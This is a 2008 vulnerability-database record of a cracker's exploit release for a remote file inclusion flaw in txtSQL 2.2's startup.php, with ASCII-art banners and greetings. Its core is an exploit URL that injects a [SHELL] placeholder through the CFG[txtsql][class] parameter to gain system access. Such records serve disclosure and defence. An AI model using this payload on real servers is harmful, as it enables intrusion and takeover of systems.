txtSQL 2.2 Final (startup.php) Remote File Inclusion Vulnerability

🗓️ 11 Aug 2008 00:00:00Reported by RootType
txtSQL 2.2 Final (startup.php) Remote File Inclusion Vulnerability. Used for system compromise via exploit URL

                                                &amp;#65279;┌┌───────────────────────────────────────────────────────────────────────────┐
││                             C r a C k E r                                ┌┘
┌┘          T H E   C R A C K   O F   E T E R N A L   M I G H T             ││
└───────────────────────────────────────────────────────────────────────────┘┘

 ┌────      From The Ashes and Dust Rises An Unimaginable crack....      ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                          [ Remote File Include ]                         ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:   Author   : CraCkEr                : :                                    :
│   Group    : N/A                    │ │                                    │
│   Script   : txtSQL 2.2 Final       │ │         Register Globals :         │
│   Download : sourceforge.net        │ │                                    │
│   Method   : GET                    │ │          [█] ON   [ ] OFF          │
│   Critical : High [&amp;#9617;&amp;#9617;&amp;#9618;&amp;#9618;▓▓██]        │ │                                    │
│   Impact   : System access          │ │                                    │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│                              DALnet #crackers                             ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:                                                                            :
│  Release Notes:                                                            │
│  ═════════════                                                             │
│  Typically used for remotely exploitable vulnerabilities that can lead to  │
│  system compromise.                                                        │
│                                                                            │

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                             Exploit URL's                                ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘

[RFI]
  
http://localhost/path/examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=[SHELL]

   
└────────────────────────────────────────────────────────────────────────────┘
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                              &amp;copy; CraCkEr 2008                              ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
11 Aug 2008 00:00Current
7.1High risk
Vulners AI Score7.1